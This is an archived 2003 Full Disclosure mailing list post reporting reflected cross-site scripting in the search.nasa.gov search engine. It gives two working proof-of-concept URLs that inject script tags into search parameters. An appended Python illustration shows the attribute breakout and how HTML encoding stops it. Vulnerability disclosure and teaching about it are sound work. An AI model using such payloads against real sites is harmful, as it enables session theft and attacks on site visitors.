Full Disclosure mailing list archives
NASA.GOV Search system Cross Site Scripting ( SEARCH.NASA.GOV )
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Wed, 15 Oct 2003 01:15:13 +0200
Hi there,

---------------------
WebSite:
Vendor: NASA w0w!
Risk: 7-5
--------------------
VENDOR NOTICED: Yes ( same email as this )
--------------------

I'm a little surprised today.....
I found some cross site scripting holes in the NASA.gov search engine ,

PROOF OF CONCEPT:

http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Simple+Search.y=10"><script>alert("The XSS Prince\nOnce upon a time there was a prince\nthat liked so much XSS exploits....");</script>

http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Go.x=17"><script>alert("The%20XSS%20Prince\nOnce%20upon%20a%20time%20there%20was%20a%20prince\nthat%20liked%20so%20much%20XSS%20exploits....");</script>&Go.y=13

Remember: website security cannot be real if maintainers don't know how much danger is a xss hole ;-)

contact info:
__________
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
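Added example, not part of the original post: a model of why the `">` prefix in the proof-of-concept URLs matters and what output encoding changes. It assumes the search page echoes the request value into a double-quoted HTML attribute, which the post does not show; `render_naive`, `render_encoded`, `TagCollector` and the sample query (with a harmless `alert(1)` body) are constructed for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Constructed query string shaped like the PoC above (assumption, not a captured request).
SAMPLE_QUERY = 'nasaInclude=null&Go.x=17"><script>alert(1)</script>&Go.y=13'


def render_naive(value):
    """Assumed vulnerable pattern: request value concatenated into an attribute."""
    return '<input type="hidden" name="Go.x" value="' + value + '">'


def render_encoded(value):
    """Same markup, with the value HTML-encoded for a double-quoted attribute."""
    return '<input type="hidden" name="Go.x" value="' + html.escape(value, quote=True) + '">'


class TagCollector(HTMLParser):
    """Records each start tag and its attributes as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def check(query=SAMPLE_QUERY):
    """Return the decoded value and the tags each rendering produces."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    value = params["Go.x"]
    return value, parsed_tags(render_naive(value)), parsed_tags(render_encoded(value))


if __name__ == "__main__":
    value, naive, encoded = check()
    print("decoded value:", value)
    print("naive tags:   ", [tag for tag, _ in naive])
    print("encoded tags: ", [tag for tag, _ in encoded])
```

In the naive rendering the attribute ends at `17` and a separate `script` element appears; in the encoded rendering the parser sees one `input` whose value is the full original string.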